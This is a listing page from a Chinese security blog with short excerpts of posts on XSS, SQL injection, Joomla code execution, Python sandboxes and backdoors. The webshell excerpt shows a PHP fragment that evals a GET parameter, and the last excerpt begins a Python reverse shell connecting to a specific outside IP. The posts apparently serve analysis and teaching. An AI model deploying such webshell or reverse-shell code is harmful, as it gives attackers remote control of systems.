安全博客文章共693篇 第4页
对JiaThis Flash XSS的挖掘与分析-安全小百科

对JiaThis Flash XSS的挖掘与分析

看到360官微在微博上说了, http://www.jiathis.com/code/swf/m.swf 存在XSS漏洞,可以导致使用了JiaThis的任意网站产生漏洞。得到这个线索,我们来开始顺藤摸瓜,对这个XSS的原理与利用方法进...
admin的头像-安全小百科admin3年前
0130
discuz7.2 faq.php 最新注入漏洞分析-安全小百科

discuz7.2 faq.php 最新注入漏洞分析

    之前乌云上被提交的漏洞,今天突然被人发出来了,然后就各种中枪。奈何各种考试马上就来了,我也没工夫去写exp或脚本什么的,趁点休息时间把代码看看就好。实话说我很讨厌这种情...
admin的头像-安全小百科admin3年前
0200
将二进制文件加入VC资源后释放执行-安全小百科

将二进制文件加入VC资源后释放执行

    标题不知道这么说好不好,感觉很乱。     我以前就很纳闷,为什么我一个木马的客户端,能配置好各种选项以后生成一个服务端。一个exe文件怎么生出另一个exe文件? ...
admin的头像-安全小百科admin3年前
0230
python - 抓取页面上的链接-安全小百科

python – 抓取页面上的链接

    除了C/C++以外,我也接触过不少流行的语言,PHP、java、javascript、python,其中python可以说是操作起来最方便,缺点最少的语言了。     前几天想写爬虫,后来跟朋...
admin的头像-安全小百科admin3年前
0150
brainfuck 语言入门-安全小百科

brainfuck 语言入门

    不介绍brainfuck这个语言了,没听说过的相信你也不会找到这篇文章,或者你去google. 图灵机相信大家都听说过(我们导论课讲过),有些人还写过相关的程序。我觉得brainfu...
admin的头像-安全小百科admin3年前
0140
Code-Breaking中的两个Python沙箱-安全小百科

Code-Breaking中的两个Python沙箱

这是发表在跳跳糖上的文章https://www.tttang.com/archive/1294/,如需转载,请联系跳跳糖。 这是一篇Code-Breaking 2018鸽了半年的Writeup,讲一讲Django模板引擎沙箱和反序列化时的沙箱,和如...
admin的头像-安全小百科admin3年前
0100
一些不包含数字和字母的webshell-安全小百科

一些不包含数字和字母的webshell

在小密圈提了个问题,“如何编写一个不使用数字和字母的webshell”,并具体成如下代码: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell...
admin的头像-安全小百科admin3年前
0210
Joomla远程代码执行漏洞分析(总结)-安全小百科

Joomla远程代码执行漏洞分析(总结)

joomla漏洞出来这么久了,我也于当天在drops发表了这篇文章( http://drops.wooyun.org/papers/11330 )。今天再看,还是有点急促,有些原理上的东西没说清楚。 我在自己博客里,把这篇文章增加...
admin的头像-安全小百科admin3年前
0130
Tornado模板对空白字符的处理与解决方案-安全小百科

Tornado模板对空白字符的处理与解决方案

Tornado模板引擎一直有一个坑,有时候你可能觉得并不影响正常使用,但强迫症就是受不了:模板会去掉每行前后的空格。 最后出来的页面就是这样: 不缩进真的很影响心情的好吧,特别是对一个pyth...
admin的头像-安全小百科admin3年前
0110
python正向连接后门-安全小百科

python正向连接后门

    python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...
admin的头像-安全小百科admin3年前
0140